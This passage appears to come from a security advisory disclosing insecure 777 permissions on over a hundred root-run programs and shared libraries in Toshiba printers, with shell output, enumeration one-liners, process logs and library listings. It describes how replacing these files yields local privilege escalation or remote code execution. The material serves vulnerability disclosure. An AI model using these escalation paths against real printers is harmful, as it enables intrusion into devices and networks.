-rwxrwxrwx 1 root root 624082 Apr 20 2018 libCryptolib.so.0.0.0  
-rwxrwxrwx 1 root root 22366570 Jun 4 2018 libFREmbed.so  
lrwxrwxrwx 1 root root 14 Mar 14 16:27 libasicif.so -> libasicif.so.1  
lrwxrwxrwx 1 root root 16 Mar 14 16:27 libasicif.so.1 ->  
libasicif.so.1.0  
-rwxrwxrwx 1 root root 12649 Apr 2 2016 libasicif.so.1.0  
[...]  
  
Insecure permissions of  
`/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/`:  
  
bash-4.1# ls -la  
/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/  
total 13036  
drwxrwxrwx 2 510 510 4096 Sep 13 2019 .  
drwxrwxrwx 18 510 510 4096 Sep 13 2019 ..  
-rwxrwxrwx 1 510 510 84844 Aug 25 2016  
libibusplatforminputcontextplugin.so  
-rwxrwxrwx 1 510 510 13252081 Sep 13 2019 libscreenkeyboardplugin.so  
bash-4.1#  
  
On a side note, all the libraries have also insecure permissions in  
the previous listing.  
  
An attacker can remotely compromise any Toshiba printer.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution  
using insecure permissions for 106 programs  
  
Some vendor-specific programs are running inside Toshiba printers.  
These programs run as root and have insecure permissions (777)  
allowing an attacker to replace these programs with malicious  
programs. This Local Privilege Escalation can be also exploited as a  
Remote Code Execution by uploading a malicious program using the  
Pre-authenticated Remote Code Execution as root or apache and multiple  
Local Privilege Escalations vulnerability.  
  
Some programs are running as root, for example:  
  
bash-4.1# ps auxw | grep root  
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00  
/home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f  
/home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1  
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02  
/home/SYSROM_SRC/bin/mapper firstboot=0  
[...]  
root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02  
./cissm -T 7 -d ssm.xml  
root 1647 0.0 0.3 67568 9256 ? Sl 16:34 0:02  
./cischeduler -S ramdisk  
root 1648 0.0 0.3 49452 11852 ? Sl 16:34 0:00  
./cisystemresourcemanager -T8  
root 1650 0.0 0.3 50320 11112 ? S 16:34 0:00  
./pipeMN -T8  
root 1652 0.0 0.3 47372 10708 ? S 16:34 0:00 ./cpe -T8  
root 1653 0.0 0.2 35524 8888 ? S 16:34 0:00 ./dem -T8  
root 1654 0.0 0.4 53448 12588 ? S 16:34 0:00 ./dim -T8  
root 1655 0.1 0.4 96460 12128 ? Sl 16:34 0:18  
./alboserver -T5  
[...]  
  
Using this one-liner, it is possible to list the file corresponding to  
programs running inside the printers:  
  
Programs running as root:  
  
bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' |  
grep -v '^\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v  
'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e  
's#^\./##')");done  
  
Running with a different user:  
  
for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v  
'^\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v  
'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e  
's#^\./##')");done  
  
These commands allow to list 106 vulnerable programs found inside the printers.  
  
  
  
### 3 vulnerable programs not running as root  
  
3 programs have been identified as vulnerable (running with a  
low-privileged user and that can be overwritten by any local or remote  
attacker):  
  
- - /home/SYSROM_SRC/thirdparty/sbin/slpd  
- - /usr/local/ebx/bin/httpd  
- - /usr/local/ebx/httpd_worker/bin/httpd_worker  
  
Vulnerable programs not running as root:  
  
bash-4.1# for i in $(ps auxww | grep -v root | awk '{ print $11 }'  
| grep -v '^\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep  
-v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e  
's#^\./##')");done  
  
lrwxrwxrwx 1 root root 26 Mar 14 16:27 /home/SYSROM_SRC/bin/slpd  
-> ../../thirdparty/sbin/slpd  
-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 /usr/local/ebx/bin/httpd  
-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34  
/usr/local/ebx/httpd_worker/bin/httpd_worker  
bash-4.1#  
  
When following the link to slpd, we can confirm it is also vulnerable:  
  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/slpd  
-rwxrwxrwx 1 root root 106023 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/sbin/slpd  
bash-4.1#  
  
  
  
### 103 vulnerable programs running as root  
  
103 programs have been identified as vulnerable (running as root and  
that can be overwritten by any local or remote attacker):  
  
- - /home/SYSROM_SRC/bin/alllmnr  
- - /home/SYSROM_SRC/bin/dnsValidateDaemon  
- - /home/SYSROM_SRC/bin/eBXDebugLogUtility  
- - /home/SYSROM_SRC/bin/ipv6_daemon  
- - /home/SYSROM_SRC/bin/mapper  
- - /home/SYSROM_SRC/bin/syscallerr  
- - /home/SYSROM_SRC/build/release/bin/agent_faxreceive  
- - /home/SYSROM_SRC/build/release/bin/agent_faxtransmit  
- - /home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive  
- - /home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit  
- - /home/SYSROM_SRC/build/release/bin/agent_print  
- - /home/SYSROM_SRC/build/release/bin/agent_rip  
- - /home/SYSROM_SRC/build/release/bin/agent_scan  
- - /home/SYSROM_SRC/build/release/bin/alaccountmgr  
- - /home/SYSROM_SRC/build/release/bin/alAddressBookMgr  
- - /home/SYSROM_SRC/build/release/bin/alappmanager  
- - /home/SYSROM_SRC/build/release/bin/alboserver  
- - /home/SYSROM_SRC/build/release/bin/alcbamanager  
- - /home/SYSROM_SRC/build/release/bin/alCloning  
- - /home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin  
- - /home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin  
- - /home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin  
- - /home/SYSROM_SRC/build/release/bin/aleFilingmgr  
- - /home/SYSROM_SRC/build/release/bin/aleSCL  
- - /home/SYSROM_SRC/build/release/bin/alExportImport  
- - /home/SYSROM_SRC/build/release/bin/alfilestoragem  
- - /home/SYSROM_SRC/build/release/bin/alftpprintd  
- - /home/SYSROM_SRC/build/release/bin/algrpmgr  
- - /home/SYSROM_SRC/build/release/bin/alhddalertmgr  
- - /home/SYSROM_SRC/build/release/bin/alhddbackuprestore  
- - /home/SYSROM_SRC/build/release/bin/alhomedatamgr  
- - /home/SYSROM_SRC/build/release/bin/alhp9100  
- - /home/SYSROM_SRC/build/release/bin/alifaxreceive  
- - /home/SYSROM_SRC/build/release/bin/alintegritychkmgr  
- - /home/SYSROM_SRC/build/release/bin/aljobcontroller  
- - /home/SYSROM_SRC/build/release/bin/aljobtemplatemgr  
- - /home/SYSROM_SRC/build/release/bin/allicensemgmt  
- - /home/SYSROM_SRC/build/release/bin/allld2d  
- - /home/SYSROM_SRC/build/release/bin/alLogmanager  
- - /home/SYSROM_SRC/build/release/bin/alLogRetriever  
- - /home/SYSROM_SRC/build/release/bin/allprng  
- - /home/SYSROM_SRC/build/release/bin/almailboxapplication  
- - /home/SYSROM_SRC/build/release/bin/almaintenanceplugin  
- - /home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr  
- - /home/SYSROM_SRC/build/release/bin/alnfcplugin  
- - /home/SYSROM_SRC/build/release/bin/alnsm  
- - /home/SYSROM_SRC/build/release/bin/alpanel  
- - /home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler  
- - /home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler  
- - /home/SYSROM_SRC/build/release/bin/alpdlfiltermanager  
- - /home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr  
- - /home/SYSROM_SRC/build/release/bin/alprintmn  
- - /home/SYSROM_SRC/build/release/bin/alreportmanager  
- - /home/SYSROM_SRC/build/release/bin/alreportsmsgr  
- - /home/SYSROM_SRC/build/release/bin/alrestrictionmode  
- - /home/SYSROM_SRC/build/release/bin/alrolemgr  
- - /home/SYSROM_SRC/build/release/bin/alsecurityconfiguration  
- - /home/SYSROM_SRC/build/release/bin/alServiceUIPlugin  
- - /home/SYSROM_SRC/build/release/bin/alsharedprintDp  
- - /home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient  
- - /home/SYSROM_SRC/build/release/bin/alstage2  
- - /home/SYSROM_SRC/build/release/bin/alUiFrameWork  
- - /home/SYSROM_SRC/build/release/bin/alulm  
- - /home/SYSROM_SRC/build/release/bin/alusbmscapplication  
- - /home/SYSROM_SRC/build/release/bin/alusbPrint  
- - /home/SYSROM_SRC/build/release/bin/aluserAuthMgr  
- - /home/SYSROM_SRC/build/release/bin/alusermgr  
- - /home/SYSROM_SRC/build/release/bin/alViewPlugin  
- - /home/SYSROM_SRC/build/release/bin/alwsdiscovery  
- - /home/SYSROM_SRC/build/release/bin/alwsmex  
- - /home/SYSROM_SRC/build/release/bin/alwsprint  
- - /home/SYSROM_SRC/build/release/bin/alwsscanner  
- - /home/SYSROM_SRC/build/release/bin/armn  
- - /home/SYSROM_SRC/build/release/bin/cipollproc  
- - /home/SYSROM_SRC/build/release/bin/ciprioritymanager  
- - /home/SYSROM_SRC/build/release/bin/cischeduler  
- - /home/SYSROM_SRC/build/release/bin/cissm  
- - /home/SYSROM_SRC/build/release/bin/cisystemresourcemanager  
- - /home/SYSROM_SRC/build/release/bin/cpe  
- - /home/SYSROM_SRC/build/release/bin/de_ipfax  
- - /home/SYSROM_SRC/build/release/bin/dem  
- - /home/SYSROM_SRC/build/release/bin/dim  
- - /home/SYSROM_SRC/build/release/bin/ebx_dl  
- - /home/SYSROM_SRC/build/release/bin/faxmilter  
- - /home/SYSROM_SRC/build/release/bin/informationservice  
- - /home/SYSROM_SRC/build/release/bin/notificationservice  
- - /home/SYSROM_SRC/build/release/bin/pipeMN  
- - /home/SYSROM_SRC/build/release/bin/sim  
- - /home/SYSROM_SRC/build/release/bin/sljobmanagement  
- - /home/SYSROM_SRC/build/release/bin/snmp_watchdog  
- - /home/SYSROM_SRC/build/release/bin/ssdktimestamp  
- - /home/SYSROM_SRC/build/release/bin/wfpc  
- - /home/SYSROM_SRC/build/thirdparty/bin/alipp  
- - /home/SYSROM_SRC/build/thirdparty/bin/dibbler-client  
- - /home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix  
- - /home/SYSROM_SRC/build/thirdparty/bin/nqcs  
- - /home/SYSROM_SRC/build/thirdparty/bin/nqnd  
- - /home/SYSROM_SRC/build/thirdparty/bin/python3.5  
- - /home/SYSROM_SRC/build/thirdparty/bin/vsftpd  
- - /home/SYSROM_SRC/build/thirdparty/libexec/slapd  
- - /home/SYSROM_SRC/build/thirdparty/sbin/snmpd  
- - /usr/local/ebx/bin/httpd  
- - /usr/local/ebx/httpd_worker/bin/httpd_worker  
  
The analysis is shown below.  
  
Vulnerable programs running as root, with insecure permissions:  
  
bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' |  
grep -v '^\[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v  
'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e  
's#^\./##')");done  
-rwxrwxrwx 1 root root 562669 Dec 6 04:10  
/home/SYSROM_SRC/build/release/bin/agent_faxreceive  
-rwxrwxrwx 1 root root 608397 Dec 6 04:11  
/home/SYSROM_SRC/build/release/bin/agent_faxtransmit  
-rwxrwxrwx 1 root root 561916 Dec 6 04:38  
/home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive  
-rwxrwxrwx 1 root root 594505 Dec 6 04:38  
/home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit  
-rwxrwxrwx 1 root root 572434 Dec 6 04:11  
/home/SYSROM_SRC/build/release/bin/agent_print  
-rwxrwxrwx 1 root root 556369 Dec 6 04:10  
/home/SYSROM_SRC/build/release/bin/agent_rip  
-rwxrwxrwx 1 root root 557372 Dec 6 04:10  
/home/SYSROM_SRC/build/release/bin/agent_scan  
-rwxrwxrwx 1 root root 2191621 Dec 6 02:13  
/home/SYSROM_SRC/build/release/bin/alAddressBookMgr  
-rwxrwxrwx 1 root root 939045 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/alCloning  
-rwxrwxrwx 1 root root 1019576 Dec 6 02:20  
/home/SYSROM_SRC/build/release/bin/alExportImport  
-rwxrwxrwx 1 root root 1354094 Dec 6 02:15  
/home/SYSROM_SRC/build/release/bin/alLogRetriever  
-rwxrwxrwx 1 root root 734343 Dec 6 02:21  
/home/SYSROM_SRC/build/release/bin/alLogmanager  
-rwxrwxrwx 1 root root 241886 Dec 6 02:24  
/home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler  
-rwxrwxrwx 1 root root 2282226 Dec 6 02:24  
/home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler  
-rwxrwxrwx 1 root root 211250 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/alServiceUIPlugin  
-rwxrwxrwx 1 root root 6104526 Dec 6 03:51  
/home/SYSROM_SRC/build/release/bin/alUiFrameWork  
-rwxrwxrwx 1 root root 673942 Dec 6 02:20  
/home/SYSROM_SRC/build/release/bin/alViewPlugin  
-rwxrwxrwx 1 root root 2896387 Dec 6 02:12  
/home/SYSROM_SRC/build/release/bin/alaccountmgr  
-rwxrwxrwx 1 root root 2917038 Dec 6 02:26  
/home/SYSROM_SRC/build/release/bin/alappmanager  
-rwxrwxrwx 1 root root 1055271 Dec 6 01:49  
/home/SYSROM_SRC/build/release/bin/alboserver  
-rwxrwxrwx 1 root root 322981 Dec 6 02:08  
/home/SYSROM_SRC/build/release/bin/alcbamanager  
-rwxrwxrwx 1 root root 2528851 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin  
-rwxrwxrwx 1 root root 4386856 Dec 6 03:30  
/home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin  
-rwxrwxrwx 1 root root 4300169 Dec 6 03:25  
/home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin  
-rwxrwxrwx 1 root root 1915456 Dec 6 02:14  
/home/SYSROM_SRC/build/release/bin/aleFilingmgr  
-rwxrwxrwx 1 root root 580229 Dec 6 01:50  
/home/SYSROM_SRC/build/release/bin/alfilestoragem  
-rwxrwxrwx 1 root root 509900 Dec 6 02:21  
/home/SYSROM_SRC/build/release/bin/algrpmgr  
-rwxrwxrwx 1 root root 441641 Dec 6 02:24  
/home/SYSROM_SRC/build/release/bin/alhddalertmgr  
-rwxrwxrwx 1 root root 696894 Dec 6 02:24  
/home/SYSROM_SRC/build/release/bin/alhddbackuprestore  
-rwxrwxrwx 1 root root 829606 Dec 6 02:16  
/home/SYSROM_SRC/build/release/bin/alhomedatamgr  
-rwxrwxrwx 1 root root 606628 Dec 6 03:28  
/home/SYSROM_SRC/build/release/bin/alifaxreceive  
-rwxrwxrwx 1 root root 162074 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/alintegritychkmgr  
-rwxrwxrwx 1 root root 4414769 Dec 6 02:08  
/home/SYSROM_SRC/build/release/bin/aljobcontroller  
-rwxrwxrwx 1 root root 2832921 Dec 6 02:15  
/home/SYSROM_SRC/build/release/bin/aljobtemplatemgr  
-rwxrwxrwx 1 root root 434559 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/allicensemgmt  
-rwxrwxrwx 1 root root 1258130 Dec 6 02:15  
/home/SYSROM_SRC/build/release/bin/almailboxapplication  
-rwxrwxrwx 1 root root 4674491 Dec 6 03:32  
/home/SYSROM_SRC/build/release/bin/almaintenanceplugin  
-rwxrwxrwx 1 root root 2339610 Dec 6 02:25  
/home/SYSROM_SRC/build/release/bin/alnfcplugin  
-rwxrwxrwx 1 root root 743285 Dec 6 01:53  
/home/SYSROM_SRC/build/release/bin/alnsm  
-rwxrwxrwx 1 root root 740586 Dec 6 03:45  
/home/SYSROM_SRC/build/release/bin/alpanel  
-rwxrwxrwx 1 root root 292667 Dec 6 02:21  
/home/SYSROM_SRC/build/release/bin/alpdlfiltermanager  
-rwxrwxrwx 1 root root 387749 Dec 6 02:22  
/home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr  
-rwxrwxrwx 1 root root 1314049 Dec 6 01:52  
/home/SYSROM_SRC/build/release/bin/alprintmn  
-rwxrwxrwx 1 root root 2360596 Dec 6 03:22  
/home/SYSROM_SRC/build/release/bin/alreportmanager  
-rwxrwxrwx 1 root root 595735 Dec 6 03:21  
/home/SYSROM_SRC/build/release/bin/alreportsmsgr  
-rwxrwxrwx 1 root root 1367678 Dec 6 02:19  
/home/SYSROM_SRC/build/release/bin/alrestrictionmode  
-rwxrwxrwx 1 root root 1253012 Dec 6 02:21  
/home/SYSROM_SRC/build/release/bin/alrolemgr  
-rwxrwxrwx 1 root root 2272202 Dec 6 02:18  
/home/SYSROM_SRC/build/release/bin/alsecurityconfiguration  
-rwxrwxrwx 1 root root 972621 Dec 6 03:52  
/home/SYSROM_SRC/build/release/bin/alsharedprintDp  
-rwxrwxrwx 1 root root 1060254 Dec 6 02:13  
/home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient  
-rwxrwxrwx 1 root root 1711439 Dec 6 02:25  
/home/SYSROM_SRC/build/release/bin/alulm  
-rwxrwxrwx 1 root root 612467 Dec 6 02:18  
/home/SYSROM_SRC/build/release/bin/alusbmscapplication  
-rwxrwxrwx 1 root root 3759736 Dec 6 02:17  
/home/SYSROM_SRC/build/release/bin/aluserAuthMgr  
-rwxrwxrwx 1 root root 2874311 Dec 6 02:20  
/home/SYSROM_SRC/build/release/bin/alusermgr  
-rwxrwxrwx 1 root root 899734 Dec 6 01:53  
/home/SYSROM_SRC/build/release/bin/alwsdiscovery  
-rwxrwxrwx 1 root root 809391 Dec 6 01:53  
/home/SYSROM_SRC/build/release/bin/alwsmex  
-rwxrwxrwx 1 root root 3782642 Dec 6 01:55  
/home/SYSROM_SRC/build/release/bin/alwsprint  
-rwxrwxrwx 1 root root 4271522 Dec 6 01:56  
/home/SYSROM_SRC/build/release/bin/alwsscanner  
-rwxrwxrwx 1 root root 355919 Dec 6 03:53  
/home/SYSROM_SRC/build/release/bin/armn  
-rwxrwxrwx 1 root root 18113 Dec 6 01:42  
/home/SYSROM_SRC/build/release/bin/cipollproc  
-rwxrwxrwx 1 root root 71587 Dec 6 01:42  
/home/SYSROM_SRC/build/release/bin/ciprioritymanager  
-rwxrwxrwx 1 root root 445362 Dec 6 01:42  
/home/SYSROM_SRC/build/release/bin/cischeduler  
-rwxrwxrwx 1 root root 532898 Dec 6 01:42  
/home/SYSROM_SRC/build/release/bin/cissm  
-rwxrwxrwx 1 root root 508004 Dec 6 01:48  
/home/SYSROM_SRC/build/release/bin/cisystemresourcemanager  
-rwxrwxrwx 1 root root 501163 Dec 6 04:16  
/home/SYSROM_SRC/build/release/bin/cpe  
-rwxrwxrwx 1 root root 1016124 Dec 6 04:39  
/home/SYSROM_SRC/build/release/bin/de_ipfax  
-rwxrwxrwx 1 root root 303779 Dec 6 04:16  
/home/SYSROM_SRC/build/release/bin/dem  
-rwxrwxrwx 1 root root 622110 Dec 6 04:16  
/home/SYSROM_SRC/build/release/bin/dim  
-rwxrwxrwx 1 root root 12229927 Dec 6 04:44  
/home/SYSROM_SRC/build/release/bin/ebx_dl  
-rwxrwxrwx 1 root root 1649127 Dec 6 04:02  
/home/SYSROM_SRC/build/release/bin/informationservice  
-rwxrwxrwx 1 root root 1257189 Dec 6 04:01  
/home/SYSROM_SRC/build/release/bin/notificationservice  
-rwxrwxrwx 1 root root 426167 Dec 6 04:14  
/home/SYSROM_SRC/build/release/bin/pipeMN  
-rwxrwxrwx 1 root root 269419 Dec 6 04:02  
/home/SYSROM_SRC/build/release/bin/sim  
-rwxrwxrwx 1 root root 258577 Dec 6 04:02  
/home/SYSROM_SRC/build/release/bin/sljobmanagement  
-rwxrwxrwx 1 root root 32089 Mar 14 16:28  
/home/SYSROM_SRC/build/release/bin/ssdktimestamp  
-rwxrwxrwx 1 root root 5986687 Dec 6 04:07  
/home/SYSROM_SRC/build/release/bin/wfpc  
-rwxrwxrwx 1 root root 78627 Dec 6 02:00 /home/SYSROM_SRC/bin/alllmnr  
-rwxrwxrwx 1 root root 68223 Dec 6 01:57  
/home/SYSROM_SRC/bin/dnsValidateDaemon  
-rwxrwxrwx 1 root root 104184 Dec 6 01:48  
/home/SYSROM_SRC/bin/eBXDebugLogUtility  
-rwxrwxrwx 1 root root 76674 Dec 6 02:01 /home/SYSROM_SRC/bin/ipv6_daemon  
-rwxrwxrwx 1 root root 28318 Dec 6 01:40 /home/SYSROM_SRC/bin/mapper  
-rwxrwxrwx 1 root root 167219 Dec 6 01:48 /home/SYSROM_SRC/bin/syscallerr  
-rwxrwxrwx 1 root root 316382 Dec 6 02:03  
/home/SYSROM_SRC/build/release/bin/aleSCL  
-rwxrwxrwx 1 root root 21142 Dec 6 02:01  
/home/SYSROM_SRC/build/release/bin/alftpprintd  
-rwxrwxrwx 1 root root 243145 Dec 6 01:53  
/home/SYSROM_SRC/build/release/bin/alhp9100  
-rwxrwxrwx 1 root root 84257 Dec 6 01:56  
/home/SYSROM_SRC/build/release/bin/allld2d  
-rwxrwxrwx 1 root root 270934 Dec 6 01:53  
/home/SYSROM_SRC/build/release/bin/allprng  
-rwxrwxrwx 1 root root 389522 Dec 6 02:02  
/home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr  
-rwxrwxrwx 1 root root 15176259 Dec 6 03:39  
/home/SYSROM_SRC/build/release/bin/alstage2  
-rwxrwxrwx 1 root root 126466 Dec 6 02:01  
/home/SYSROM_SRC/build/release/bin/alusbPrint  
-rwxrwxrwx 1 root root 1419229 Dec 6 02:01  
/home/SYSROM_SRC/build/release/bin/faxmilter  
-rwxrwxrwx 1 root root 21638 Dec 6 03:28  
/home/SYSROM_SRC/build/release/bin/snmp_watchdog  
-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 /usr/local/ebx/bin/httpd  
-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34  
/usr/local/ebx/httpd_worker/bin/httpd_worker  
  
The previous command lists symbolic links that we can analyze, and we  
can confirm they are also vulnerable due to insecure permissions:  
  
lrwxrwxrwx 1 root root 35 Mar 14 16:27  
/home/SYSROM_SRC/bin/dibbler-client ->  
../../thirdparty/bin/dibbler-client  
lrwxrwxrwx 1 root root 26 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/alipp -> ../../thirdparty/bin/alipp  
lrwxrwxrwx 1 root root 39 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/mDNSResponderPosix ->  
../../thirdparty/bin/mDNSResponderPosix  
lrwxrwxrwx 1 root root 25 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/nqcs -> ../../thirdparty/bin/nqcs  
lrwxrwxrwx 1 root root 25 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/nqnd -> ../../thirdparty/bin/nqnd  
lrwxrwxrwx 1 root root 30 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/slapd ->  
../../thirdparty/libexec/slapd  
lrwxrwxrwx 1 root root 27 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/snmpd ->  
../../thirdparty/sbin/snmpd  
lrwxrwxrwx 1 root root 27 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/vsftpd ->  
../../thirdparty/bin/vsftpd  
lrwxrwxrwx 1 root root 27 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/python ->  
../../thirdparty/bin/python  
  
bash-4.1# for i in dibbler-client alipp mDNSResponderPosix nqcs  
nqnd vsftpd python; do ls -la  
/home/SYSROM_SRC/build/thirdparty/bin/$i;done  
-rwxrwxrwx 1 root root 11339780 Dec 6 01:38  
/home/SYSROM_SRC/build/thirdparty/bin/dibbler-client  
-rwxrwxrwx 1 apache messagebus 653763 Dec 6 01:40  
/home/SYSROM_SRC/build/thirdparty/bin/alipp  
-rwxrwxrwx 1 root root 429709 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix  
-rwxrwxrwx 1 apache messagebus 1342015 Dec 6 01:35  
/home/SYSROM_SRC/build/thirdparty/bin/nqcs  
-rwxrwxrwx 1 apache messagebus 501752 Dec 6 01:35  
/home/SYSROM_SRC/build/thirdparty/bin/nqnd  
-rwxrwxrwx 1 root root 232030 Dec 6 01:34  
/home/SYSROM_SRC/build/thirdparty/bin/vsftpd  
lrwxrwxrwx 1 root root 7 Mar 14 16:27  
/home/SYSROM_SRC/build/thirdparty/bin/python -> python3  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/libexec/slapd  
-rwxrwxrwx 1 root root 1709140 Dec 6 01:34  
/home/SYSROM_SRC/build/thirdparty/libexec/slapd  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/snmpd  
-rwxrwxrwx 1 apache messagebus 41801 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/sbin/snmpd  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/python3  
lrwxrwxrwx 1 root root 28 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/python3 ->  
../../thirdparty/bin/python3  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3  
lrwxrwxrwx 1 root root 9 Mar 14 16:27  
/home/SYSROM_SRC/build/thirdparty/bin/python3 -> python3.5  
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3.5  
-rwxrwxrwx 1 root root 20997 Dec 6 01:28  
/home/SYSROM_SRC/build/thirdparty/bin/python3.5  
bash-4.1#  
  
An attacker can remotely compromise any Toshiba printer.  
  
The programs can be replaced by malicious programs by any local or  
remote attacker.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution  
using insecure permissions for libraries  
  
Some vendor-specific programs are running inside Toshiba printers.  
These programs run as root and use code from libraries that have  
insecure permissions (777) allowing an attacker to replace these  
libraries with malicious ones. This Local Privilege Escalation can be  
also exploited as a Remote Code Execution by uploading a malicious  
library using the Pre-authenticated Remote Code Execution as root or  
apache and multiple Local Privilege Escalations vulnerability.  
  
For example, the `/home/SYSROM_SRC/bin/syscallerr` program runs  
regularly as root:  
  
  
  
### Example with `/home/SYSROM_SRC/bin/syscallerr`:  
  
Output of `pspy32`, where we can see `/home/SYSROM_SRC/bin/syscallerr`  
running regularly as root:  
  
2023/05/27 16:13:35 CMD: UID=0 PID=31370 | sh -c du -cb  
/work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print  
$1}'  
2023/05/27 16:13:35 CMD: UID=0 PID=31373 | sh -c du -cb  
/work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print  
$1}'  
2023/05/27 16:13:35 CMD: UID=0 PID=31372 | grep total  
2023/05/27 16:13:35 CMD: UID=0 PID=31371 | sh -c du -cb  
/work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print  
$1}'  
2023/05/27 16:13:35 CMD: UID=0 PID=31374 |  
/home/SYSROM_SRC/bin/syscallerr  
2023/05/27 16:13:35 CMD: UID=0 PID=31376 | awk {print}  
2023/05/27 16:13:35 CMD: UID=0 PID=31375 |  
2023/05/27 16:13:35 CMD: UID=0 PID=31377 | sh -c ps -e | grep ebx_dl  
2023/05/27 16:13:35 CMD: UID=0 PID=31379 | grep ebx_dl  
2023/05/27 16:13:35 CMD: UID=0 PID=31378 | ps -e  
2023/05/27 16:13:35 CMD: UID=0 PID=31380 |  
/home/SYSROM_SRC/bin/syscallerr  
2023/05/27 16:13:35 CMD: UID=0 PID=31383 | sh -c ps -e |  
grep ebx_dl | awk '{print $5}'  
2023/05/27 16:13:35 CMD: UID=0 PID=31382 |  
2023/05/27 16:13:35 CMD: UID=0 PID=31381 | ps -e  
2023/05/27 16:13:35 CMD: UID=0 PID=31384 | sh -c ps -e | grep cissm  
2023/05/27 16:13:35 CMD: UID=0 PID=31386 | grep cissm  
2023/05/27 16:13:35 CMD: UID=0 PID=31385 | ps -e  
2023/05/27 16:13:35 CMD: UID=0 PID=31387 | sh -c dd  
if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL > /dev/null 2>&1  
2023/05/27 16:13:35 CMD: UID=0 PID=31388 | dd  
if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL  
2023/05/27 16:13:35 CMD: UID=0 PID=31389 | sh -c ps -e | grep ebx_dl  
2023/05/27 16:13:35 CMD: UID=0 PID=31391 | grep ebx_dl  
  
When analyzing this program, we can find several shared libraries that  
will be loaded - their code will be executed as root.  
  
We can find the previously vulnerable shared libraries defined with LD_PRELOAD:  
  
- - `/ramdisk/al/libGetNameInfoInterface.so`  
- - `/ramdisk/al/libGetAddtInfoInterface.so`  
  
We can also find several libraries that are being loaded:  
  
bash-4.1# ldd /home/SYSROM_SRC/bin/syscallerr  
linux-gate.so.1 => (0x777c0000)  
/ramdisk/al/libGetNameInfoInterface.so (0x777b1000)  
/ramdisk/al/libGetAddtInfoInterface.so (0x777a0000)  
libpthread.so.0 => /lib/libpthread.so.0 (0x77780000)  
libsqlite3.so.0 => /usr/lib/libsqlite3.so.0 (0x4be4c000)  
libciindexeddb.so =>  
/home/SYSROM_SRC/build/release/lib/libciindexeddb.so (0x77729000)  
libsyscallerr.so =>  
/home/SYSROM_SRC/build/release/lib/libsyscallerr.so (0x77720000)  
libcios.so =>  
/home/SYSROM_SRC/build/release/lib/libcios.so (0x776ad000)  
libatawrapper.so.0 => /mfp/lib/libatawrapper.so.0 (0x7768b000)  
libmfpcommonwrapper.so.0 =>  
